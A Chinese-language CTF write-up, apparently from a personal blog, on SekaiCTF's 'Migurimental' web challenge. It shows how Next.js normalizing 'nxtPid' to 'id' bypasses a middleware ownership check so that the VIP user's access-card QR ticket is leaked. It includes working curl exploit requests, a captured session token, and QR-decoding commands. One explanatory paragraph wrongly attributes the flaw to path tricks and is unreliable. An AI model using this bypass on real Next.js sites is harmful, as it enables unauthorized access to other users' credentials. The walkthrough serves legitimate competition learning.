<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  
  <title>SekaiCTF-Migurimental | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="description" content="附件关键点  附件里有两个 Next.js 16.2.9 应用 backstage1：  普通用户注册后 tier 固定为 REGULAR。 数据库初始化时创建 id&#x3D;1 的 miku 用户，tier&#x3D;VIP，密码和 ticket_uuid 都是随机值。 &#x2F;access-card 在 middleware 中校验 query.id &#x3D;&#x3D;&#x3D; session.sub。 &#x2F;access-card 的">
<meta property="og:type" content="article">
<meta property="og:title" content="SekaiCTF-Migurimental">
<meta property="og:url" content="https://apollo5211.github.io/2026/07/02/sekaictf-migurimental/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="附件关键点  附件里有两个 Next.js 16.2.9 应用 backstage1：  普通用户注册后 tier 固定为 REGULAR。 数据库初始化时创建 id&#x3D;1 的 miku 用户，tier&#x3D;VIP，密码和 ticket_uuid 都是随机值。 &#x2F;access-card 在 middleware 中校验 query.id &#x3D;&#x3D;&#x3D; session.sub。 &#x2F;access-card 的">
<meta property="og:locale" content="en_US">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-01.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-02.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-03.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-04.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-05.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-06.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-07.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-08.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-09.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-10.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-11.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-12.png">
<meta property="og:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-13.png">
<meta property="article:published_time" content="2026-07-01T18:09:00.000Z">
<meta property="article:modified_time" content="2026-07-02T01:28:59.574Z">
<meta property="article:author" content="John Doe">
<meta property="article:tag" content="Migurimental">
<meta property="article:tag" content="Next.js">
<meta property="article:tag" content="SekaiCTF">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://apollo5211.github.io/images/sekaictf-migurimental/img-01.png">
  
    <link rel="alternate" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="shortcut icon" href="/favicon.png">
  
  
  
<link rel="stylesheet" href="/css/style.css">

  
    
<link rel="stylesheet" href="/fancybox/jquery.fancybox.min.css">

  
  
<link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/fork-awesome@1.2.0/css/fork-awesome.min.css">

<meta name="generator" content="Hexo 8.1.2"></head>

<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"><span class="fa fa-bars"></span></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
        
          <a class="nav-icon" href="/atom.xml" title="RSS Feed"><span class="fa fa-rss"></span></a>
        
        <a class="nav-icon nav-search-btn" title="Search"><span class="fa fa-search"></span></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="https://Apollo5211.github.io"></form>
      </div>
    </div>
  </div>
</header>

      <div class="outer">
        <section id="main"><article id="post-sekaictf-migurimental" class="h-entry article article-type-post" itemprop="blogPost" itemscope itemtype="https://schema.org/BlogPosting">
  <div class="article-meta">
    <a href="/2026/07/02/sekaictf-migurimental/" class="article-date">
  <time class="dt-published" datetime="2026-07-01T18:09:00.000Z" itemprop="datePublished">2026-07-02</time>
</a>
    
  <div class="article-category">
    <a class="article-category-link" href="/categories/CTF/">CTF</a>►<a class="article-category-link" href="/categories/CTF/Web/">Web</a>
  </div>

  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="p-name article-title" itemprop="headline name">
      SekaiCTF-Migurimental
    </h1>
  

      </header>
    
    <div class="e-content article-entry" itemprop="articleBody">
      
        <!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-01.png"></p>
<h2 id="附件关键点"><a href="#附件关键点" class="headerlink" title="附件关键点"></a>附件关键点</h2><!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-02.png"></p>
<p>附件里有两个 Next.js 16.2.9 应用</p>
<p><code>backstage1</code>：</p>
<ul>
<li>普通用户注册后 <code>tier</code> 固定为 <code>REGULAR</code>。</li>
<li>数据库初始化时创建 <code>id=1</code> 的 <code>miku</code> 用户，<code>tier=VIP</code>，密码和 <code>ticket_uuid</code> 都是随机值。</li>
<li><code>/access-card</code> 在 middleware 中校验 <code>query.id === session.sub</code>。</li>
<li><code>/access-card</code> 的 SSR 代码直接使用 <code>query.id</code> 查询用户，并把用户的 <code>ticket_uuid</code> 做成二维码。</li>
<li><code>/backroom</code> 在 middleware 中校验 cookie <code>ticket_uuid === session.ticketUuid</code>。</li>
<li><code>/backroom</code> 的 SSR 代码用 <code>req.cookies.ticket_uuid</code> 查用户，只有 <code>id=1</code> 可以得到 flag 前半段。</li>
</ul>
<p><code>backstage2</code>：</p>
<ul>
<li><code>/</code> 的 SSR 代码读取 <code>/flag.txt</code> 后半段。</li>
<li>middleware 只允许请求头 <code>x-real-migu: 1.3.3.7</code>。</li>
<li>nginx 会设置 <code>X-Real-Migu $remote_addr</code>，所以不能直接从客户端伪造这个头。</li>
<li><code>next.config.js</code> 配置了：</li>
</ul>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="variable language_">module</span>.<span class="property">exports</span> = &#123;</span><br><span class="line">  <span class="attr">assetPrefix</span>: <span class="string">&#x27;/cdn&#x27;</span>,</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<h2 id="注册普通用户"><a href="#注册普通用户" class="headerlink" title="注册普通用户"></a>注册普通用户</h2><p>先在第一个站注册一个普通账号：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl -i -s -X POST <span class="string">&#x27;https://migurimental.chals.sekai.team/api/register&#x27;</span> \</span><br><span class="line">  -H <span class="string">&#x27;Content-Type: application/x-www-form-urlencoded&#x27;</span> \</span><br><span class="line">  --data <span class="string">&#x27;username=yang&amp;password=password12345&#x27;</span></span><br></pre></td></tr></table></figure>

<p>响应会设置两个 cookie：</p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-03.png"></p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InlhbmciLCJ0aWVyIjoiUkVHVUxBUiIsInRpY2tldFV1aWQiOiIyZTVlMDg5MC1lZGFjLTRkZWMtODFhYy1kYmZjYjQ0N2RlNDEiLCJzdWIiOiIxMTIwIiwiaWF0IjoxNzgyNjQxNTYzfQ.tENiS3<span class="built_in">_</span>nGHwV4o8Zj6h0dli9PP8BTd2Y2lMUiWQn3o8</span><br><span class="line">ticket<span class="built_in">_</span>uuid=2e5e0890-edac-4dec-81ac-dbfcb447de41</span><br></pre></td></tr></table></figure>

<p>我这边打的时候的信息如下</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">user id: 1120</span><br><span class="line">session: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InlhbmciLCJ0aWVyIjoiUkVHVUxBUiIsInRpY2tldFV1aWQiOiIyZTVlMDg5MC1lZGFjLTRkZWMtODFhYy1kYmZjYjQ0N2RlNDEiLCJzdWIiOiIxMTIwIiwiaWF0IjoxNzgyNjQxNTYzfQ.tENiS3<span class="built_in">_</span>nGHwV4o8Zj6h0dli9PP8BTd2Y2lMUiWQn3o8</span><br><span class="line">ticket<span class="built_in">_</span>uuid: 2e5e0890-edac-4dec-81ac-dbfcb447de41</span><br></pre></td></tr></table></figure>

<p>也可以用burp来看到自己的session和ticket_uuid</p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-04.png"></p>
<p>如果重新注册，后续命令中的 <code>1120</code>、<code>session</code>、普通用户 <code>ticket_uuid</code> 需要替换成自己的值。</p>
<h2 id="漏洞一：Next-js-内部查询参数归一化导致鉴权绕过"><a href="#漏洞一：Next-js-内部查询参数归一化导致鉴权绕过" class="headerlink" title="漏洞一：Next.js 内部查询参数归一化导致鉴权绕过"></a>漏洞一：Next.js 内部查询参数归一化导致鉴权绕过</h2><p>Next.js 内部会把带特殊前缀的查询参数名归一化：</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line">nxtPid -&gt; id</span><br><span class="line">nxtIid -&gt; id</span><br></pre></td></tr></table></figure>

<p><code>backstage1</code> 的 middleware 逻辑是：</p>
<p>middleware.js如下</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">import</span> &#123; <span class="title class_">NextResponse</span> &#125; <span class="keyword">from</span> <span class="string">&#x27;next/server&#x27;</span></span><br><span class="line"><span class="keyword">import</span> &#123; verifyJwt &#125; <span class="keyword">from</span> <span class="string">&#x27;./lib/jwt&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">function</span> <span class="title function_">deny</span>(<span class="params">request</span>) &#123;</span><br><span class="line">  <span class="keyword">return</span> <span class="title class_">NextResponse</span>.<span class="title function_">redirect</span>(<span class="keyword">new</span> <span class="title function_">URL</span>(<span class="string">&#x27;/failed&#x27;</span>, request.<span class="property">url</span>), <span class="number">302</span>)</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">export</span> <span class="keyword">async</span> <span class="keyword">function</span> <span class="title function_">middleware</span>(<span class="params">request</span>) &#123;</span><br><span class="line">  <span class="keyword">const</span> session = <span class="keyword">await</span> <span class="title function_">verifyJwt</span>(request.<span class="property">cookies</span>.<span class="title function_">get</span>(<span class="string">&#x27;session&#x27;</span>)?.<span class="property">value</span>)</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (!session?.<span class="property">sub</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_">deny</span>(request)</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (request.<span class="property">nextUrl</span>.<span class="property">pathname</span> === <span class="string">&#x27;/access-card&#x27;</span>) &#123;</span><br><span class="line">    <span class="keyword">const</span> checkedId = request.<span class="property">nextUrl</span>.<span class="property">searchParams</span>.<span class="title function_">get</span>(<span class="string">&#x27;id&#x27;</span>)</span><br><span class="line">    </span><br><span class="line">    <span class="keyword">if</span> (checkedId !== session.<span class="property">sub</span>) &#123;</span><br><span class="line">      <span class="keyword">return</span> <span class="title function_">deny</span>(request)</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">if</span> (request.<span class="property">nextUrl</span>.<span class="property">pathname</span> === <span class="string">&#x27;/backroom&#x27;</span>) &#123;</span><br><span class="line">    <span class="keyword">const</span> expectedTicket = session.<span class="property">ticketUuid</span></span><br><span class="line">    <span class="keyword">const</span> middlewareTicket = request.<span class="property">cookies</span>.<span class="title function_">get</span>(<span class="string">&#x27;ticket_uuid&#x27;</span>)?.<span class="property">value</span> || <span class="string">&#x27;&#x27;</span></span><br><span class="line"></span><br><span class="line">    <span class="keyword">if</span> (!expectedTicket || middlewareTicket !== expectedTicket) &#123;</span><br><span class="line">      <span class="keyword">return</span> <span class="title function_">deny</span>(request)</span><br><span class="line">    &#125;</span><br><span class="line">  &#125;</span><br><span class="line"></span><br><span class="line">  <span class="keyword">return</span> <span class="title class_">NextResponse</span>.<span class="title function_">next</span>()</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="keyword">export</span> <span class="keyword">const</span> config = &#123;</span><br><span class="line">  <span class="attr">matcher</span>: [<span class="string">&#x27;/access-card&#x27;</span>, <span class="string">&#x27;/backroom&#x27;</span>],</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<p> 这段代码的核心漏洞原理在于：<strong>Next.js 的路由匹配机制（</strong><code>**matcher**</code><strong>）与实际控制访问的路径逻辑之间存在“不一致性”。</strong> 攻击者可以通过在 URL 中构造<strong>特殊字符（如路径穿越或多重斜杠）</strong>，让中间件误以为请求不需要拦截，从而直接绕过鉴权，访问到敏感页面</p>
<figure class="highlight javascript"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (request.<span class="property">nextUrl</span>.<span class="property">pathname</span> === <span class="string">&#x27;/access-card&#x27;</span>) &#123;</span><br><span class="line">  <span class="keyword">const</span> checkedId = request.<span class="property">nextUrl</span>.<span class="property">searchParams</span>.<span class="title function_">get</span>(<span class="string">&#x27;id&#x27;</span>)</span><br><span class="line">  <span class="keyword">if</span> (checkedId !== session.<span class="property">sub</span>) &#123;</span><br><span class="line">    <span class="keyword">return</span> <span class="title function_">deny</span>(request)</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<p>这段代码本质上是一段用于防御水平越权漏洞（Horizontal Privilege Escalation）或 IDOR（不安全的直接对象引用，Insecure Direct Object Reference）<strong>的</strong>基于资源的访问控制（Resource-Based Access Control）逻辑。</p>
<p>从应用安全和后端架构的视角，我们可以将其拆解为以下三个核心执行阶段：</p>
<h3 id="1-路由匹配与鉴权触发-Routing-Trigger-Condition"><a href="#1-路由匹配与鉴权触发-Routing-Trigger-Condition" class="headerlink" title="1. 路由匹配与鉴权触发 (Routing &amp; Trigger Condition)"></a>1. 路由匹配与鉴权触发 (Routing &amp; Trigger Condition)</h3><p>JavaScript</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">if (request.nextUrl.pathname === &#x27;/access-card&#x27;)</span><br></pre></td></tr></table></figure>

<ul>
<li><strong>技术解析</strong>：这是中间件层面的<strong>端点匹配（Endpoint Matching）</strong>。系统通过对 HTTP 请求体中的 URI 路径（<code>pathname</code>）进行严格相等（Strict Equality, <code>===</code>）断言，来决定是否针对该特定端点（<code>/access-card</code>）执行后续的细粒度授权策略</li>
</ul>
<h3 id="2-目标资源标识符提取-Resource-Identifier-Extraction"><a href="#2-目标资源标识符提取-Resource-Identifier-Extraction" class="headerlink" title="2. 目标资源标识符提取 (Resource Identifier Extraction)"></a>2. 目标资源标识符提取 (Resource Identifier Extraction)</h3><p>JavaScript</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">const checkedId = request.nextUrl.searchParams.get(&#x27;id&#x27;)</span><br></pre></td></tr></table></figure>

<ul>
<li><strong>技术解析</strong>：系统解析 HTTP GET 请求的查询字符串（Query String），提取出客户端试图访问的目标资源标识符（Resource ID）。在安全语境下，这是一个<strong>不可信的用户输入（Untrusted User Input）</strong>，攻击者可以任意操纵该参数</li>
</ul>
<h3 id="3-身份断言与授权校验-Identity-Assertion-Authorization-Check"><a href="#3-身份断言与授权校验-Identity-Assertion-Authorization-Check" class="headerlink" title="3. 身份断言与授权校验 (Identity Assertion &amp; Authorization Check)"></a>3. 身份断言与授权校验 (Identity Assertion &amp; Authorization Check)</h3><p>JavaScript</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">if (checkedId !== session.sub) &#123;</span><br><span class="line">  return deny(request)</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure>

<ul>
<li><strong>技术解析</strong>：这是核心的鉴权控制平面（Control Plane）逻辑。<ul>
<li><code>session.sub</code> 提取自服务端验证过的 JWT（JSON Web Token）的 <strong>Payload 中的 <strong><code>**sub**</code></strong>（Subject）声明</strong>。这是一个由密码学签名保证完整性的<strong>可信身份凭据（Trusted Identity Credential）</strong>。</li>
<li>代码通过比对“不可信的资源请求 ID”与“可信的当前会话身份 ID”，来验证当前主体（Subject）是否拥有对该客体（Object）的访问权限。</li>
<li>如果断言失败（即两者不匹配），则调用 <code>deny(request)</code> 抛出未授权异常或执行 HTTP 302 重定向，从而阻断潜在的 IDOR 攻击</li>
</ul>
</li>
</ul>
<p>页面 SSR 逻辑是：</p>
<p>access-card.js,, 这就是我们在成功绕过上一步中间件鉴权后，服务端实际渲染并返回给我们的页面代码  </p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br><span class="line">27</span><br><span class="line">28</span><br><span class="line">29</span><br><span class="line">30</span><br><span class="line">31</span><br><span class="line">32</span><br><span class="line">33</span><br><span class="line">34</span><br><span class="line">35</span><br><span class="line">36</span><br><span class="line">37</span><br><span class="line">38</span><br><span class="line">39</span><br><span class="line">40</span><br><span class="line">41</span><br><span class="line">42</span><br><span class="line">43</span><br><span class="line">44</span><br><span class="line">45</span><br><span class="line">46</span><br><span class="line">47</span><br><span class="line">48</span><br><span class="line">49</span><br><span class="line">50</span><br><span class="line">51</span><br></pre></td><td class="code"><pre><span class="line">import &#123; findById &#125; from <span class="string">&#x27;../lib/users&#x27;</span></span><br><span class="line">import QRCode from <span class="string">&#x27;qrcode&#x27;</span></span><br><span class="line"></span><br><span class="line"><span class="built_in">export</span> async <span class="keyword">function</span> getServerSideProps(&#123; query &#125;) &#123;</span><br><span class="line">  const user = await findById(query.id)</span><br><span class="line">  <span class="keyword">if</span> (!user) <span class="built_in">return</span> &#123; notFound: <span class="literal">true</span> &#125;</span><br><span class="line">  const qrDataUrl = await QRCode.toDataURL(user.ticketUuid, &#123;</span><br><span class="line">    errorCorrectionLevel: <span class="string">&#x27;M&#x27;</span>,</span><br><span class="line">    margin: 1,</span><br><span class="line">    width: 220,</span><br><span class="line">    color: &#123;</span><br><span class="line">      dark: <span class="string">&#x27;#06111a&#x27;</span>,</span><br><span class="line">      light: <span class="string">&#x27;#ffffffff&#x27;</span>,</span><br><span class="line">    &#125;,</span><br><span class="line">  &#125;)</span><br><span class="line"></span><br><span class="line">  <span class="built_in">return</span> &#123;</span><br><span class="line">    props: &#123;</span><br><span class="line">      user: &#123;</span><br><span class="line">        <span class="built_in">id</span>: user.id,</span><br><span class="line">        username: user.username,</span><br><span class="line">        tier: user.tier,</span><br><span class="line">      &#125;,</span><br><span class="line">      qrDataUrl,</span><br><span class="line">    &#125;,</span><br><span class="line">  &#125;</span><br><span class="line">&#125;</span><br><span class="line"></span><br><span class="line"><span class="built_in">export</span> default <span class="keyword">function</span> AccessCard(&#123; user, qrDataUrl &#125;) &#123;</span><br><span class="line">  <span class="built_in">return</span> (</span><br><span class="line">    &lt;main&gt;</span><br><span class="line">      &lt;section className=<span class="string">&quot;panel card&quot;</span>&gt;</span><br><span class="line">        &lt;div className=<span class="string">&quot;photo&quot;</span>&gt;&#123;user.username.slice(0, 1).toUpperCase()&#125;&lt;/div&gt;</span><br><span class="line">        &lt;div&gt;</span><br><span class="line">          &lt;h1&gt;Concert Access Card&lt;/h1&gt;</span><br><span class="line">          &lt;p className=<span class="string">&quot;muted&quot;</span>&gt;Username&lt;/p&gt;</span><br><span class="line">          &lt;h2&gt;&#123;user.username&#125;&lt;/h2&gt;</span><br><span class="line">          &lt;p className=<span class="string">&quot;muted&quot;</span>&gt;Ticket tier&lt;/p&gt;</span><br><span class="line">          &lt;p&gt;</span><br><span class="line">            &lt;span className=<span class="string">&quot;tier&quot;</span>&gt;&#123;user.tier&#125;&lt;/span&gt;</span><br><span class="line">          &lt;/p&gt;</span><br><span class="line">          &lt;a className=<span class="string">&quot;button&quot;</span> href=<span class="string">&quot;/backroom&quot;</span>&gt;Enter Backroom&lt;/a&gt;</span><br><span class="line">        &lt;/div&gt;</span><br><span class="line">        &lt;div className=<span class="string">&quot;qr&quot;</span>&gt;</span><br><span class="line">          &lt;img src=&#123;qrDataUrl&#125; alt=<span class="string">&quot;Ticket QR&quot;</span> /&gt;</span><br><span class="line">        &lt;/div&gt;</span><br><span class="line">      &lt;/section&gt;</span><br><span class="line">    &lt;/main&gt;</span><br><span class="line">  )</span><br><span class="line">&#125;</span><br><span class="line"></span><br></pre></td></tr></table></figure>

<ul>
<li><strong>工作原理</strong>：当用户访问 <code>/access-card?id=xxx</code> 时，这段代码会在<strong>服务器端</strong>执行。它会拿到 URL 里的 <code>id</code>（就是上一关你越权查的那个 ID），去数据库里查询对应的用户信息。</li>
<li><strong>敏感数据操作</strong>：拿到用户信息后，它提取了用户的 <code>ticketUuid</code>（这是一个非常核心的敏感凭据），并调用 <code>QRCode.toDataURL</code> 将这个文本编码成了一个<strong>二维码的 Base64 图片</strong>。</li>
<li><strong>数据过滤</strong>：在返回给前端的 <code>props</code> 时，开发者耍了个“小聪明”。他没有直接把 <code>ticketUuid</code> 传给前端，而是传了 <code>user</code>（只有 id, username, tier）和 <code>qrDataUrl</code>（二维码图片）</li>
</ul>
<p>因此我们就可以去构造渲染出access card</p>
<p>构造：</p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">/access-card?nxtPid=&lt;自己的用户 id&gt;<span class="built_in">&amp;</span>id=1</span><br></pre></td></tr></table></figure>

<p>middleware 侧会通过自己的 id 校验，但 SSR 最终使用 <code>id=1</code> 查询，渲染出 <code>miku</code> 的 access card。</p>
<p>推荐直接请求 data route，响应更好解析：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl -s \</span><br><span class="line">  -H <span class="string">&#x27;Cookie: session=&lt;SESSION&gt;; ticket_uuid=&lt;OWN_TICKET&gt;&#x27;</span> \</span><br><span class="line">  <span class="string">&#x27;https://migurimental.chals.sekai.team/_next/data/3_SEgyxks-2tgaI5l4ILx/access-card.json?nxtPid=&lt;OWN_ID&gt;&amp;id=1&#x27;</span></span><br></pre></td></tr></table></figure>

<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-05.png"></p>
<p>响应中可以看到：</p>
<figure class="highlight json"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br></pre></td><td class="code"><pre><span class="line"><span class="punctuation">&#123;</span></span><br><span class="line">  <span class="attr">&quot;pageProps&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">    <span class="attr">&quot;user&quot;</span><span class="punctuation">:</span> <span class="punctuation">&#123;</span></span><br><span class="line">      <span class="attr">&quot;id&quot;</span><span class="punctuation">:</span> <span class="number">1</span><span class="punctuation">,</span></span><br><span class="line">      <span class="attr">&quot;username&quot;</span><span class="punctuation">:</span> <span class="string">&quot;miku&quot;</span><span class="punctuation">,</span></span><br><span class="line">      <span class="attr">&quot;tier&quot;</span><span class="punctuation">:</span> <span class="string">&quot;VIP&quot;</span></span><br><span class="line">    <span class="punctuation">&#125;</span><span class="punctuation">,</span></span><br><span class="line">    <span class="attr">&quot;qrDataUrl&quot;</span><span class="punctuation">:</span> <span class="string">&quot;data:image/png;base64,...&quot;</span></span><br><span class="line">  <span class="punctuation">&#125;</span></span><br><span class="line"><span class="punctuation">&#125;</span></span><br></pre></td></tr></table></figure>



<p>burpsuit</p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-06.png"></p>
<h2 id="解码-miku-ticket"><a href="#解码-miku-ticket" class="headerlink" title="解码 miku ticket"></a>解码 miku ticket</h2><p><code>qrDataUrl</code> 是二维码图片，二维码内容就是 <code>miku</code> 的 <code>ticket_uuid</code>。</p>
<p>可以用 Python + OpenCV 解码：</p>
<figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c <span class="string">&quot;import json,base64,cv2,numpy as np; d=json.load(open(&#x27;miku-card.json&#x27;)); s=d[&#x27;pageProps&#x27;][&#x27;qrDataUrl&#x27;]; b=base64.b64decode(s.split(&#x27;,&#x27;,1)[1]); open(&#x27;miku-qr.png&#x27;,&#x27;wb&#x27;).write(b); img=cv2.imdecode(np.frombuffer(b,np.uint8), cv2.IMREAD_COLOR); print(cv2.QRCodeDetector().detectAndDecode(img)[0])&quot;</span></span><br></pre></td></tr></table></figure>

<p>在此之前还需要 把这个响应保存成 <code>miku-card.json</code>，再从里面提取二维码  </p>
<p>保存 miku card：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line">curl -s -o miku-card.json \</span><br><span class="line">  -H &#x27;Cookie: session=eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJ1c2VybmFtZSI6InlhbmciLCJ0aWVyIjoiUkVHVUxBUiIsInRpY2tldFV1aWQiOiIyZTVlMDg5MC1lZGFjLTRkZWMtODFhYy1kYmZjYjQ0N2RlNDEiLCJzdWIiOiIxMTIwIiwiaWF0IjoxNzgyNjQxNTYzfQ.tENiS3_nGHwV4o8Zj6h0dli9PP8BTd2Y2lMUiWQn3o8; ticket_uuid=2e5e0890-edac-4dec-81ac-dbfcb447de41&#x27; \</span><br><span class="line">  &#x27;https://migurimental.chals.sekai.team/_next/data/3_SEgyxks-2tgaI5l4ILx/access-card.json?nxtPid=1120&amp;id=1&#x27;</span><br></pre></td></tr></table></figure>

<p>提取 QR 图片：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">python -c &quot;import json,base64; d=json.load(open(&#x27;miku-card.json&#x27;)); s=d[&#x27;pageProps&#x27;][&#x27;qrDataUrl&#x27;]; b=base64.b64decode(s.split(&#x27;,&#x27;,1)[1]); open(&#x27;miku-qr.png&#x27;,&#x27;wb&#x27;).write(b)&quot;</span><br></pre></td></tr></table></figure>

<p>识别 QR：</p>
<figure class="highlight plaintext"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">zbarimg miku-qr.png</span><br></pre></td></tr></table></figure>

<p>本次解出的 miku ticket：</p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-07.png"></p>
<!-- 这是一张图片，ocr 内容为： -->
<p><img src="/images/sekaictf-migurimental/img-08.png"></p>
<figure class="highlight latex"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">0464e4c2-2700-4e36-8401-597482a41ac7</span><br></pre></td></tr></table></figure>

